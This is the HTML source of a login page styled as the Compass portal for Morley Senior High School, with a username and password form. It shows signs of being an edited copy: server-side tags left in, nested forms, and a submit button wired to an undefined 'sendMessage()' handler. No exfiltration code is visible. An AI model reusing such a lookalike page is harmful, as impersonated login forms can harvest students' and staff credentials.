<!DOCTYPE html>
  <html xmlns="http://www.w3.org/1999/xhtml" xmlns:asp="http://www.w3.org/1999/html" lang="en" xml:lang="en">
    <head>
      <title>Login | Compass
      </title>
                          <meta http-equiv="X-UA-Compatible" content="IE=Edge"/>
                          <meta http-equiv="Content-type" content="text/html;charset=UTF-8"/>
                          <script src="/cdn-cgi/apps/head/nXBUbHOMoxcWCnUqQqrCuyGGJ4s.js"></script>
                          <meta name="robots" content="noindex, nofollow"/>
                          <link id="favicon" rel="SHORTCUT ICON" href="/Assets/Pix/favicon_v11855.png"/>
                          <script src="https://challenges.cloudflare.com/turnstile/v0/api.js" async defer></script>
                          <script type="text/javascript" src="https://assets.compass.education/Assets/Scripts/Lib/jquery-3.6.1.min.js"></script>
                          <script type="text/javascript" src="https://assets.compass.education/Assets/Scripts/Lib/jquery-migrate-1.4.1.min.js"></script>
                          <script type="text/javascript" src="https://assets.compass.education/Assets/Scripts/Lib/jquery-migrate-3.4.0.min.js"></script>
                          <meta name="google-play-app" content="app-id=com.jdlf.compass"/>
                          <meta name="apple-itunes-app" content="app-id=778415974"/>
                          <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
                          <link id="lnkSmartAppBanner" rel="stylesheet" href="https://assets.compass.education/Assets/Scripts/Lib/SmartAppBanner/smart-app-banner.css"/>
                          <link id="lnkCssReset" rel="stylesheet" href="https://assets.compass.education/Assets/Styles/reset.css"/>
                          <script type="text/javascript" src="https://assets.compass.education/Assets/Scripts/Lib/SmartAppBanner/smart-app-banner.js"></script>
                          <script type='text/javascript' src='https://assets.compass.education/Assets/Scripts/Lib/SmartAppBanner/SmartBannerManipulation.js'></script>
      <script type="text/javascript" src="https://assets.compass.education/Assets/Common/Scripts/cookie-script.js"></script>
          <script type="text/javascript" src="https://assets.compass.education/Assets/Common/Scripts/cookie-script-init.js"></script>
          <style id="ctl09_ctlStyleCabinRegular400" type="text/css">
              /* cabin-regular - latin */
              @font-face {
                  font-family: 'Cabin';
                  font-style: normal;
                  font-weight: 400;
                  font-display: fallback;
                  src: url('/Assets/Fonts/CabinFamily/cabin-v17-latin-regular.eot');
                  /* IE9 Compat Modes */
                  src: local(''), url('/Assets/Fonts/CabinFamily/cabin-v17-latin-regular.eot?#iefix') format('embedded-opentype'), /* IE6-IE8 */ url('/Assets/Fonts/CabinFamily/cabin-v17-latin-regular.woff2') format('woff2'), /* Super Modern Browsers */ url('/Assets/Fonts/CabinFamily/cabin-v17-latin-regular.woff') format('woff'), /* Modern Browsers */ url('/Assets/Fonts/CabinFamily/cabin-v17-latin-regular.ttf') format('truetype'), /* Safari, Android, iOS */ url('/Assets/Fonts/CabinFamily/cabin-v17-latin-regular.svg#Cabin') format('svg');
                  /* Legacy iOS */
              }
          </style>
          <style id="ctl09_ctlStyleCabinRegular600" type="text/css">
              /* cabin-600 - latin */
              @font-face {
                  font-family: 'Cabin';
                  font-style: normal;
                  font-weight: 600;
                  font-display: fallback;
                  src: url('/Assets/Fonts/CabinFamily/cabin-v17-latin-600.eot');
                  /* IE9 Compat Modes */
                  src: local(''), url('/Assets/Fonts/CabinFamily/cabin-v17-latin-600.eot?#iefix') format('embedded-opentype'), /* IE6-IE8 */ url('/Assets/Fonts/CabinFamily/cabin-v17-latin-600.woff2') format('woff2'), /* Super Modern Browsers */ url('/Assets/Fonts/CabinFamily/cabin-v17-latin-600.woff') format('woff'), /* Modern Browsers */ url('/Assets/Fonts/CabinFamily/cabin-v17-latin-600.ttf') format('truetype'), /* Safari, Android, iOS */ url('/Assets/Fonts/CabinFamily/cabin-v17-latin-600.svg#Cabin') format('svg');
                  /* Legacy iOS */
              }
          </style>
          <style type="text/css">
              html {
                  font-size: 16px;
                  height: 100%;
                  box-sizing: border-box;
              }

              body {
                  line-height: 1.5;
                  font-family: 'Cabin', Roboto, Arial, Helvetica, sans-serif;
                  height: 100%;
                  color: #303030;
              }

              input {
                  font-family: 'Cabin', Roboto, Arial, Helvetica, sans-serif;
              }

              h1, h2 {
                  margin-bottom: 1.5rem;
                  font-weight: 600;
                  line-height: 1.25;
              }

              h1 {
                  font-size: 1.5rem;
              }

              h2 {
                  font-size: 1.5rem;
              }

              h3 {
                  font-size: 1.15rem;
                  font-weight: 600;
                  line-height: 1.25;
              }

              p {
                  margin-bottom: 1rem;
              }

              p:last-child {
                  margin-bottom: 0;
              }

              a {
                  text-decoration: none;
                  cursor: pointer;
                  color: #0E6CD9;
                  outline: none;
                  transition: box-shadow 0.2s ease;
                  border-radius: 0.3125rem;
              }

              a:hover {
                  text-decoration: underline;
              }

              a:focus {
                  box-shadow: 0 0 0 1px #fff, 0 0 0 4px #419FFB;
              }

              a:active {
                  box-shadow: 0 0 0 0 #fff, 0 0 0 4px #419FFB;
              }

              label {
                  display: block;
                  color: #3E4B62;
              }

              .recaptchaPanel {
                  display: flex;
                  justify-content: center;
                  padding-top: .5rem;
              }

              .button {
                  border: none;
                  background-color: #0E6CD9;
                  border-radius: 0.3125rem;
                  outline: none;
                  color: #fff;
                  font-weight: 600;
                  font-size: 1rem;
                  line-height: 1;
                  padding: 1rem;
                  -webkit-appearance: none;
                  -moz-appearance: none;
                  cursor: pointer;
                  transition: background-color 0.2s ease, box-shadow 0.2s ease;
              }

              .button:hover {
                  background-color: #0E6CD9;
                  text-decoration: underline;
              }

              .button:focus {
                  background-color: #004FAC;
                  box-shadow: 0 0 0 1px #fff, 0 0 0 4px #419FFB;
              }

              .button:active {
                  background-color: #003F8A;
                  box-shadow: 0 0 0 0 #fff, 0 0 0 3px #419FFB;
              }

              .inverseButton {
                  border: solid;
                  border-color: #0E6CD9;
                  border-width: thin;
                  background-color: #fff;
                  border-radius: 0.3125rem;
                  outline: none;
                  color: #0E6CD9;
                  font-weight: 600;
                  font-size: 1rem;
                  line-height: 0.9rem;
                  padding: 1rem;
                  -webkit-appearance: none;
                  -moz-appearance: none;
                  cursor: pointer;
                  transition: background-color 0.2s ease, box-shadow 0.2s ease;
              }

              .inverseButton:hover {
                  text-decoration: underline;
              }

              .inverseButton:focus {
                  background-color: #9fc4f0;
                  box-shadow: 0 0 0 .1rem #fff, 0 0 0 .1rem #419FFB;
              }

              .inverseButton:active {
                  background-color: #9fc4f0;
                  box-shadow: 0 0 0 0 #fff, 0 0 0 .1rem #419FFB;
              }

              input[type="submit"]:disabled {
                  background-color: #9fc4f0;
              }

              input[type="submit"]:disabled:hover {
                  text-decoration: none;
              }

              .browserWarningWrapper {
                  display: flex;
                  align-items: center;
                  background-color: #fff;
                  width: 100%;
                  height: 100%;
                  position: fixed;
                  z-index: 99999;
              }

              .error {
                  color: #C80E0E;
                  background-color: #FFF3F3;
                  margin-bottom: 1rem;
                  padding: 1rem;
                  border: 1px solid #C80E0E;
                  border-radius: 0.3125rem;
              }

              .browserWarning {
                  border: solid 1px #C80E0E;
                  border-radius: 0.3125rem;
                  padding: 1rem;
                  background: #C80E0E;
                  margin: 1rem auto;
                  margin-top: 2rem;
                  color: #fff;
              }

              .browserWarning a {
                  color: #fff;
                  font-weight: 600;
              }

              .ieWarningWrapper {
                  height: 100%;
                  position: fixed;
                  left: 0;
                  top: 0;
                  width: 100%;
                  background-color: #fff;
                  display: flex;
                  align-items: center;
                  justify-content: center;
              }

              .ieWarning {
                  border: 2px solid #C80E0E;
                  padding: 1rem;
                  border-radius: 0.3125rem;
                  width: 40rem;
              }

              .title {
                  margin-top: 0.5rem;
              }

              .textInput {
                  -webkit-appearance: none;
                  border: 1px solid #BFC3CB;
                  border-radius: 0.3125rem;
                  padding: 0 1.125rem;
                  height: 3rem;
                  font-size: 1rem;
                  margin-top: 0.5rem;
                  box-shadow: 0 0 0 0 #419FFB, inset 0px 2px 0px rgba(41, 55, 80, 0.05), ;
                  transition: border-color 0.2s ease, box-shadow 0.2s ease;
              }

              .forgottenLink {
                  margin-top: .15rem;
                  margin-bottom: .25rem;
                  float: left;
                  clear: both;
              }

              #mspForgottenLink {
                  margin-top: 1rem;
              }

              .checkbox {
                  display: flex;
                  align-items: center;
                  cursor: pointer;
              }

              .checkbox > * {
                  cursor: pointer;
              }

              .checkbox > input[type="checkbox"] {
                  margin: 0;
                  margin-right: 0.5rem;
                  outline: none;
              }

              .checkbox > input[type="checkbox"]:focus {
                  box-shadow: 0 0 0 1px #fff, 0 0 0 4px #419FFB;
              }

              .checkbox > input[type="checkbox"]:active {
                  box-shadow: 0 0 0 0 #fff, 0 0 0 4px #419FFB;
              }

              .textInput:focus, .textInput:active {
                  outline: none;
                  border: 1px solid #0E6CD9;
                  box-shadow: 0 0 0 3px #419FFB, inset 0px 2px 0px rgba(41, 55, 80, 0.05);
              }

              .textInput::placeholder {
                  color: #949BA8;
                  transition: color 0.2s ease;
              }

              .textInput:focus::placeholder {
                  color: #D4D7DC;
              }

              .roundButton {
                  width: 3rem;
                  height: 3rem;
                  border-radius: 50%;
                  position: relative;
                  outline: none;
                  transition: box-shadow 0.2s ease;
                  flex-shrink: 0;
              }

              .roundButton:focus {
                  box-shadow: 0 0 0 1px #fff, 0 0 0 4px #419FFB;
              }

              .roundButton:active {
                  box-shadow: 0 0 0 0 #fff, 0 0 0 4px #419FFB;
              }

              .schoolName {
                  text-align: center;
              }

              .compassBackground {
                  background-color: #fff;
                  position: fixed;
                  width: 100%;
                  height: 100%;
                  left: 0;
                  top: 0;
                  z-index: -1;
                  background-image: none;
                  background-position: center;
                  background-repeat: no-repeat;
                  background-size: cover;
              }

              .compassBackground-transition {
                  transition: width 0.3s ease, bottom 0.3s ease, left 0.3s ease, top 0.3s ease;
              }

              .compassBackground-interest--left {
                  display: block;
                  position: absolute;
                  bottom: -25rem;
                  left: -60rem;
              }

              .compassBackground-interest--right {
                  display: block;
                  position: absolute;
                  top: -55rem;
                  right: -32rem;
              }

              .compassLogo-color {
                  display: block;
                  position: absolute;
                  bottom: 4rem;
                  left: 0;
                  right: 0;
                  margin-left: auto;
                  margin-right: auto;
                  width: 8rem;
              }

              .compassLogo-white {
                  display: none;
                  position: absolute;
                  bottom: 1rem;
                  left: 1rem;
              }

              .compassLogo-mobile {
                  position: static;
                  margin-bottom: 4rem;
              }

              .centerWrapper {
                  width: 100%;
                  height: 100%;
                  display: flex;
                  align-items: stretch;
                  justify-content: flex-start;
                  flex-direction: column;
              }

              .loginFormContainer {
                  margin: 0.25rem;
                  background-color: white;
                  border-radius: 0.5rem;
                  padding: 2rem 1rem;
                  box-shadow: 0px 7px 16px rgba(80, 80, 80, 0.45);
              }

              .schoolLogo {
                  background-image: url("/Download/Cdn/LoginPageLogo/1689661047381.jpg");
                  background-repeat: no-repeat;
                  background-position: center;
                  background-size: contain;
                  width: 8.75rem;
                  height: 8.75rem;
                  margin-left: auto;
                  margin-right: auto;
                  margin-bottom: 1rem;
              }

              .loginForm {
                  align-self: stretch;
              }

              .loginAuthPanel {
                  display: flex;
                  flex-direction: column;
              }

              .loginAuthPanel > h3 {
                  align-self: center;
              }

              .cf-turnstile {
                  display: flex;
                  justify-content: center;
              }

              .LoginButtonDisabled {
                  opacity: 0.5;
                  pointer-events: none;
              }

              .backToSignInSSOButton {
                  display: flex;
                  flex-direction: row;
                  margin-top: 1.56rem;
                  margin-bottom: 2rem;
              }

              .backToSignInWithSSOButtonText {
                  font-family: 'Cabin', Roboto, Arial, Helvetica, sans-serif;
                  font-weight: 500;
                  font-size: 1rem;
                  text-align: center;
                  color: #0E6CD9;
                  padding: 0 0 0 0.5rem;
                  cursor: pointer;
                  border: none;
                  background: transparent;
              }

              .backToSignInWithSSOButtonText:hover {
                  text-decoration-line: underline;
              }

              .rememberMe {
                  margin-bottom: .5rem;
                  margin-top: .5rem;
              }

              .socialLoginOptions {
                  display: none;
                  flex-direction: column;
                  align-items: stretch;
                  margin-bottom: 2rem;
              }

              .socialLoginOptions > * {
                  margin-bottom: 1rem;
              }

              .socialLoginOptions > *:last-child {
                  margin-bottom: 0;
              }

              .socialLoginOptions-divider {
                  border-top: 1px solid #BFC3CB;
                  display: none;
                  position: relative;
                  margin-bottom: 1.5rem;
                  margin-top: 1.3rem;
              }

              .socialLoginOptions-divider::after {
                  content: 'or';
                  position: absolute;
                  width: 3rem;
                  left: calc(50% - 1.5rem);
                  background-color: #fff;
                  text-align: center;
                  transform: translateY(-50%);
              }

              .socialButtonContainer {
                  display: flex;
                  flex-direction: column;
                  align-items: stretch;
                  position: relative;
              }

              .socialButtonContainer::after {
                  position: absolute;
                  content: '';
                  background-position: center;
                  background-size: contain;
                  width: 3rem;
                  bottom: 0;
                  left: 0.0625rem;
                  top: 0;
              }

              .googleButtonContainer::after {
                  background-image: url('/Assets/Pix/auth-google.svg');
              }

              .facebookButtonContainer::after {
                  background-image: url('/Assets/Pix/auth-facebook.svg');
              }

              .googleButton {
                  background-color: #4285F4;
                  padding-left: 3rem;
                  border-radius: 3px;
              }

              .googleButton:hover {
                  background-color: #4285F4;
              }

              .googleButton:focus {
                  background-color: #B5C9EA;
              }

              .googleButton:active {
                  background-color: #3367D6;
              }

              .facebookButton {
                  background-color: #1877f2;
                  padding-left: 3rem;
              }

              .facebookButton:hover {
                  background-color: #1877f2;
              }

              .facebookButton:focus {
                  background-color: #1877f2;
              }

              .facebookButton:active {
                  background-color: #4267b2;
              }

              .signInWrapper {
                  display: flex;
                  align-items: center;
                  margin-top: 1rem;
              }

              .signInWrapper > * {
                  margin-right: 1rem;
              }

              .signInWrapper > *:last-child {
                  margin-right: 0;
              }

              .otherSignInWrapper {
                  display: flex;
                  align-items: center;
                  margin-top: .5rem;
              }

              .otherSignInWrapper:last-child {
                  margin-top: .75rem;
              }

              .otherSignInWrapper > * {
                  margin-right: 1rem;
              }

              .otherSignInWrapper > *:last-child {
                  margin-right: 0;
              }

              .orWrapper {
                  display: flex;
                  align-items: center;
                  flex-direction: row;
                  margin-top: .5rem;
              }

              .loginButton {
                  flex-grow: 1;
              }

              .goBackButton {
                  background: none!important;
                  border: none;
                  padding: 0!important;
                  font-family: 'Cabin', Roboto, Arial, Helvetica, sans-serif;
                  color: #0E6CD9;
                  font-size: 1rem;
                  text-decoration: none;
                  cursor: pointer;
                  outline: none;
                  transition: box-shadow 0.2s ease;
                  display: flex;
                  align-content: flex-start;
                  margin: .5rem;
              }

              .goBackButton:hover {
                  text-decoration: underline;
              }

              .goBackButton:focus {
                  box-shadow: 0 0 0 .08rem #fff, 0 0 0 .1rem #419FFB;
              }

              .goBackButton:active {
                  box-shadow: 0 0 0 0 #fff, 0 0 0 .1rem #419FFB;
              }

              .siteInfo {
                  margin-top: 1rem;
                  color: transparent;
              }

              .customBackground {
                  display: none;
              }

              .customBackground-attribution {
                  display: none;
                  position: fixed;
                  bottom: 1rem;
                  right: 1rem;
                  text-align: right;
                  background-color: rgba(0, 0, 0, 0.3);
                  color: #ffffff;
                  font-size: 0.875rem;
                  padding: 1rem;
                  border-radius: 0.5rem;
                  z-index: 100;
              }

              .twoFactorButtonsContainer {
                  margin-top: 1rem;
                  display: flex;
                  justify-content: center;
              }

              .twoFactorButtonsContainer > * {
                  margin-right: 1rem;
              }

              .twoFactorButtonsContainer > *:last-child {
                  margin-right: 0;
              }

              .accessCodeInputWrapper {
                  margin-top: 1rem;
                  display: flex;
              }

              .accessCodeInput {
                  flex-grow: 1;
                  margin: 0;
                  margin-right: 1rem;
              }

              .hide--desktop {
                  display: block;
              }

              .hide--mobile {
                  display: none;
              }

              .samlSignInContainer {
                  display: flex;
                  flex-direction: column;
                  align-content: center;
                  padding-bottom: 1.5625rem;
              }

              .samlSignInButtonContainer {
                  display: flex;
                  border-radius: 0.3125rem;
                  background: #F6991C;
                  justify-content: center;
                  padding: 0.75rem;
                  cursor: pointer;
                  margin-top: 1rem;
              }

              .samlSignInButtonContainer:hover {
                  text-decoration: underline;
                  text-decoration-color: #FFFFFF;
              }

              .samlSignInButtonKeyImage {
                  width: 1.125rem;
                  height: 1.0625rem;
                  color: #FFFFFF;
              }

              .samlSignInButtonText {
                  font-family: 'Cabin', Roboto, Arial, Helvetica, sans-serif;
                  font-weight: 600;
                  font-size: 1rem;
                  text-align: center;
                  color: #FFFFFF;
                  padding-left: 0.625rem;
                  cursor: pointer;
                  border: none;
                  background: transparent;
              }

              .divider {
                  display: flex;
                  align-items: center;
                  padding-top: 1.5625rem;
                  padding-bottom: 1.5625rem;
              }

              .solidLineDivider {
                  border-style: none;
                  background-color: #7F8796;
                  width: 100%;
                  height: 1px;
              }

              .dividerText {
                  padding: 0 0.875rem 0 0.875rem;
              }

              .samlSignInAnotherWayButton {
                  display: flex;
                  align-self: center;
              }

              .samlSignInAnotherWayButtonText {
                  border: none;
                  background: transparent;
                  color: #0E6CD9;
                  cursor: pointer;
                  font-weight: 500;
                  font-family: 'Cabin', Roboto, Arial, Helvetica, sans-serif;
                  font-size: 1rem;
              }

              .samlSignInAnotherWayButtonText:hover {
                  text-decoration-line: underline;
              }

              @media screen and (min-width: 500px) {
                  .centerWrapper {
                      align-items: center;
                      justify-content: center;
                  }

                  .loginFormContainer {
                      padding: 2.5rem;
                      width: 20rem;
                  }

                  .compassBackground {
                      background-color: #E7F3FF;
                  }

                  .siteInfo {
                      margin-bottom: 0;
                  }

                  .customBackground {
                      display: none;
                      background-image: none;
                      background-position: center;
                      background-repeat: no-repeat;
                      background-size: cover;
                      width: 100%;
                      position: relative;
                  }

                  .customBackground-attribution {
                      display: none;
                  }

                  .compassBackground-interest--left {
                      bottom: -25rem;
                      left: -58rem;
                  }

                  .compassBackground-interest--right {
                      right: -28rem;
                  }

                  .centerWrapper-customBackground {
                      flex-direction: row;
                      align-items: stretch;
                      height: auto;
                      min-height: 100vh;
                      position : relative;
                  }

                  .loginFormContainer-customBackground {
                      margin: 0;
                      border-radius: 0;
                      padding: 1.5rem;
                      min-width: 20rem;
                      position: relative;
                      z-index: 1000;
                  }

                  .loginForm-customBackground {
                  }

                  .schoolLogo-customBackground {
                  }

                  .siteInfo-customBackground {
                      position: absolute;
                      bottom: 1rem;
                      left: 1rem;
                      z-index: 1000;
                  }

                  .schoolName-customBackground {
                  }

                  .loginAuthPanel-customBackground {
                  }

                  .hide--desktop {
                      display: none;
                  }

                  .hide--mobile {
                      display: block;
                  }
              }

              @media screen and (min-width: 768px) {
                  .compassBackground-interest--left {
                      bottom: -24rem;
                      left: -50rem;
                  }
              }

              @media screen and (min-width: 1280px) {
                  .compassBackground-interest--left {
                      bottom: -20rem;
                      left: -40rem;
                  }
              }

              @media screen and (max-height: 1100px) {
                  .compassLogo-color.hide--mobile > img {
                      display: none;
                  }

                  .compassLogo-color.compassLogo-mobile {
                      display: block;
                      padding-bottom: 2rem;
                  }
              }

              @media screen and (max-height: 1100px) and (min-width: 500px) {
                  .compassLogo-color.compassLogo-mobile.hide--desktop {
                      display: none;
                  }
              }

              .hide {
                  display: none;
              }
          </style>
      </head>
    <div class="compassBackground">
        <!-- these SVGs are inline on the page to reduce network chatter and give a visually appealing first render -->
        <div class="compassBackground-interest--left compassBackground-transition">
            <svg width="1280" height="1368" fill="none" xmlns="http://www.w3.org/2000/svg">
                <path d="M752.088 949.613c-25.854-3.863-208.252-31.16-274.924-187.11-7.748-18.127-44.575-104.455-12.502-191.483 33.304-90.127 112.924-106.004 108.955-166.245-3.524-53.66-67.712-56.271-93.396-127.57-26.066-72.382-.149-181.422 70.174-210.374 48.417-19.932 111.226.827 148.585 37.889 64.719 64.082 15.176 138.862 63.679 240.07 55.188 115.429 151.28 84.098 214.556 192.671 73.235 125.703 42.455 335.61-71.448 399.374-50.392 28.231-103.627 20.271-153.679 12.778z" fill="url(#paint0_linear)"/>
                <path d="M1258.5 1209.17c34.9-112.62-107.21-272.521-225.23-346.601-75.802-47.59-115.219-43.175-167.691-102.63-72.445-82.146-40.096-139.33-112.117-227.334-65.547-80.214-108.255-53.066-181.167-132.049-85.882-92.865-45.234-153.87-117.913-249.771C372.703 43.04 201.534-38.129 108.902 20.031 46.476 59.109 24.23 158.703 43.546 234.714 73.412 352.202 184.978 344.476 254.77 477.799c14.752 28.146 22.372 51.877 26.108 73.252 11.229 64.316 6.368 110.61 4.245 140.412-7.683 108.87 54.213 201.82 78.029 237.565 62.575 93.952 110.228 72.952 217.018 179.622 109.952 109.82 86.073 158.73 157.605 208.57 152.809 106.51 476.955 33.24 520.725-108.05z" fill="url(#paint1_linear)"/>
                <path d="M1279.02 1319.72h-.38c-170.05-14.86-293.182-66.85-366.01-154.51-36.275-43.71-50.391-81.98-65.355-122.52-16.472-44.703-33.538-90.934-81.764-149.943-49.182-60.134-89.321-76.415-128.165-92.271-37.826-15.389-73.549-29.929-116.596-81.127-63.34-75.354-78.856-141.325-95.307-211.16-13.415-57.035-27.297-116.023-67.797-185.709C290.104 206.308 170.048 114.928.789 50.782a1.168 1.168 0 01-.7-1.55 1.295 1.295 0 011.612-.7c169.811 64.252 290.292 155.993 358.089 272.653 40.691 70.047 54.615 129.162 68.073 186.367 16.387 69.538 31.84 135.255 94.818 210.141 42.665 50.752 78.113 65.186 115.641 80.448 39.12 15.92 79.578 32.37 129.12 92.993 48.502 59.306 65.611 105.728 82.167 150.706 14.859 40.33 28.932 78.43 64.974 121.82 72.382 87.03 194.967 138.84 364.307 153.64.16.01.31.05.46.12.14.07.26.17.37.29.1.12.18.26.22.41.05.15.07.31.05.47-.02.27-.13.52-.31.72-.17.2-.4.34-.66.41z" fill="#99C9FF"/>
                <path d="M358.983 323.075c-112.308 22.011-201.947-10.486-257.348-41.604-60.028-33.729-93.969-73.21-94.309-73.613a1.194 1.194 0 01-.134-1.337c.076-.139.18-.262.304-.361a1.25 1.25 0 011.74.148c.34.404 33.963 39.609 93.736 73.104 55.04 30.906 144.042 63.17 255.566 41.306a1.233 1.233 0 011.443.956 1.212 1.212 0 01-.998 1.401zM542.408 746.991a1.269 1.269 0 01-1.431-.728 1.174 1.174 0 010-.921c.061-.146.151-.278.264-.388 37.485-35.491 62.087-81.318 73.103-136.189 8.83-43.981 9.021-93.82.552-148.16a687.009 687.009 0 00-49.733-167.858 1.166 1.166 0 01.615-1.592c.144-.072.3-.115.46-.127a1.225 1.225 0 01.886.3c.121.106.219.235.289.379a688.136 688.136 0 0150.051 168.474c8.491 54.615 8.321 104.752-.551 149.009-11.123 55.379-35.958 101.653-73.826 137.504a1.6 1.6 0 01-.679.297z" fill="#99C9FF"/>
                <defs>
                    <linearGradient id="paint0_linear" x1="508.087" y1="-164.623" x2="634.277" y2="320.862" gradientUnits="userSpaceOnUse">
                        <stop stop-color="#FFC244"/>
                        <stop offset="1" stop-color="#F16F56"/>
                    </linearGradient>
                    <linearGradient id="paint1_linear" x1="793.865" y1="1096.95" x2="431.304" y2="70.423" gradientUnits="userSpaceOnUse">
                        <stop stop-color="#62AAF9"/>
                        <stop offset=".98" stop-color="#8FC0FA"/>
                    </linearGradient>
                </defs>
            </svg>
        </div>
        <div class="compassBackground-interest--right compassBackground-transition">
            <svg width="1280" height="1132" fill="none" xmlns="http://www.w3.org/2000/svg">
                <path d="M1109.04 1086.63c-122.063 73.5-257.934 36.17-290.632 27.19-19.067-5.25-173.492-50.16-254.346-192.688-72.613-128.052-20.782-220.155-119.789-329.654-29.161-31.681-63.305-58.383-101.079-79.05-89.965-46.775-128.922-15.904-197.036-57.021C73.2558 411.416 45.6361 332.41 27.6388 280.913 5.65444 217.967-14.548 160.166 14.2745 106.441 42.5178 53.9414 108.76 21.8001 168.232 25.3862 259.733 30.8433 267.106 116.531 394 160.411c80.187 27.686 96.892.356 162.155 34.413 70.964 37.019 74.439 81.478 139.546 132.419 66.287 51.853 117.339 48.557 207.526 74.595 85.977 24.835 269.803 77.959 340.993 206.212 77.94 140.437 26.64 381.04-135.18 478.58z" fill="url(#paint3_linear)"/>
                <path d="M567.241 401.718c-.24.07-.497.067-.736-.008-.239-.075-.451-.22-.608-.415-.157-.195-.253-.433-.276-.683-.022-.25.03-.5.15-.721 20.336-36.507 28.689-97.025-46.998-177.991-45.461-48.624-100.455-81.945-101.012-82.28-.286-.175-.49-.456-.569-.781-.08-.325-.027-.669.146-.956.179-.281.46-.482.783-.561.324-.079.666-.029.954.138.535.334 55.796 33.812 101.525 82.703 60.741 64.951 77.134 127.541 47.376 180.953-.159.287-.422.502-.735.602z" fill="#fff" opacity=".7"/>
                <path d="M985.413 556.855c-50.071 11.744-101.793 14.758-152.889 8.909-59.894-7.06-118.452-26.728-174.093-58.558-94.686-54.103-148.767-125.513-149.235-126.248-.098-.134-.169-.287-.208-.448-.038-.162-.044-.329-.017-.493.027-.164.086-.321.174-.462.089-.14.204-.262.34-.357.275-.203.62-.289.958-.239.338.05.642.232.847.506.534.713 54.37 71.767 148.634 125.603 55.328 31.607 113.597 51.23 173.068 58.179 74.395 8.776 151.04-2.227 227.798-32.542.15-.066.32-.1.49-.101.17-.001.34.031.5.096.15.064.3.158.42.278.12.119.21.261.28.418.06.156.09.323.09.491-.01.168-.04.333-.11.486-.07.153-.17.292-.29.407-.12.115-.27.205-.42.264-24.81 9.865-50.33 17.825-76.337 23.811z" fill="#fff"/>
                <defs>
                    <linearGradient id="paint3_linear" x1="897515" y1="2423420" x2="1425340" y2="3038940" gradientUnits="userSpaceOnUse">
                        <stop stop-color="#FFC244"/>
                        <stop offset="1" stop-color="#F16F56"/>
                    </linearGradient>
                </defs>
            </svg>
        </div>
        <div class="compassLogo-color hide--mobile">
            <img src="https://assets.compass.education/Assets/Pix/logo-wordmark-color.svg" alt="Compass Logo"/>
        </div>
    </div>
    <asp:Panel class="centerWrapper ">
      <asp:Panel class="loginFormContainer ">
          <div class="schoolLogo "></div>
          <asp:Panel class="loginForm ">
              <h1 class="schoolName ">Morley Senior High School</h1>
              <form method="post" action="https://morleyshs-wa.compass.education/login.aspx?sessionstate=disabled" id="ctl01">
                  <div class="aspNetHidden">
                      <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value=""/>
                      <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value=""/>
                      <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="rnQ7H5PKPv7wS/4KDux9x9khVcJBrhWf3D6BRVJGjJQUqTNKmXp24BoqHL69rqQQiwPluXhM6KhNNoVfibiY0EH8PVxrW47HxfSXnWqy0zObv0vtyVX6a2+4hN6SJ/SmZAf+Jj1Dk+waaiUbpXVsGNCE9ZMok6og6maAhKZrHCYUmG/ws474mxN2I29Wt1ghvF1G9e2p3pwfi3cPVSWWpDQEYZ3WmfeiMGIlh+t0d1QXDvO9hgtJWPBakV/lvI4TPUCqSRtXUPyzykbwHhkVWuUlzN5aCbAtsTvnvJBoF6SL2nJBMIWOu4Tgtxs+qApqlCogqdvBOQ/r/u+Rxh30ogRMpBVsBGaFrhhe3Yz6eFcw57HOKjv2CmZml02CXoalXDS2tzzSVQXbqmrKVXikkSZ6I1Mdw/L/0N9cHRTdsTvmoR30ttEMZBuYzfoM7lXgXtoKJhTyjKGGsbdYW1ycF2FPup9f9QZ87F3cx+3Y5g4DFz0YTDh/5H50N4jgoQ7zK5zxrNpCSuJfKdR5svJbOGf106r+8R8x8E4/215FXEJtrgFCOB/E+sZhZybXHkR4MN4nsTDUJeyuqNTsnM962haOEx/gy/M4H2DJLwB4TC0Ym96yXrw4GTxB3YZxdmSzvmanyNtrJKBtcL7TM6lE6ILqbW3rFbEaW7Csmv1Ey1I4+W5MLo5Hw16Eif2X+OU5YmN/BrnyApa8qbj1juVb251ArTfo/UCFGldQVsRkegTaQTnoT5PnYedP6ZIAx9dBOIzLI4jaxhv5p303+IzxTfYKzhxYRQKaNkvsYAmTpC7nw9bm0l4ApP7aA2wbKK7By2fnJrGsK6hYD2PCEu3012/0tDAdNskmhlKvAWNROahzzHtWPsW3FY7qowW6ieSL"/>
                  </div>
                  <script type="text/javascript">
                      //<![CDATA[
                      var theForm = document.forms['ctl01'];
                      if (!theForm) {
                          theForm = document.ctl01;
                      }
                      function __doPostBack(eventTarget, eventArgument) {
                          if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                              theForm.__EVENTTARGET.value = eventTarget;
                              theForm.__EVENTARGUMENT.value = eventArgument;
                              theForm.submit();
                          }
                      }
                      //]]>
                  </script>
                <input type="hidden" name="browserFingerprint" id="browserFingerprint"/>
                  <div class="form-wrap">
                    <form class="form">
                      <div id="loginAuthPanel" class="loginAuthPanel" onkeypress="javascript:return WebForm_FireDefaultButton(event, &#39;button1&#39;)">

                <div id="username-error" class=""></div>
                <label for="username">Username</label>
                <input name="username" type="text" id="username" class="textInput" placeholder="Username"/>
                <br/>
                <div id="username-error" class=""></div>
                <label for="password">Password</label>
                <input name="password" type="password" id="password" class="textInput" placeholder="Password"/>
                      </div>

                <div class="signInWrapper">
                        <input type="submit" name="button1" id="button1" class="loginButton button" onclick="sendMessage()"></button>
                      </span>  

                </div>
                

                    <div class="socialLoginOptions-divider"></div>
                        <div class="socialLoginOptions">
                            <div class="socialButtonContainer googleButtonContainer"></div>
                            <div class="socialButtonContainer facebookButtonContainer"></div>
                        </div>
                        <span class="rememberMe checkbox">
                            <input id="rememberMeChk" type="checkbox" name="rememberMeChk" checked="checked"/>
                            <label for="rememberMeChk">Remember me</label>
                        </span>
                        <a href="https://morleyshs-wa.compass.education/Portal/ForgotPassword.aspx" id="forgottenLink" class="forgottenLink">Can’t access your account?</a>
                    </div>
                    <div class="aspNetHidden">
                        <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB"/>
                    </div>
                      <div class="customBackground">
                        <div class="customBackground-attribution"></div>
                        <div class="compassLogo-white">
                            <img src="https://assets.compass.education/Assets/Pix/logo-wordmark-white.svg" alt="Compass Logo"/>
                        </div>
                      </div>
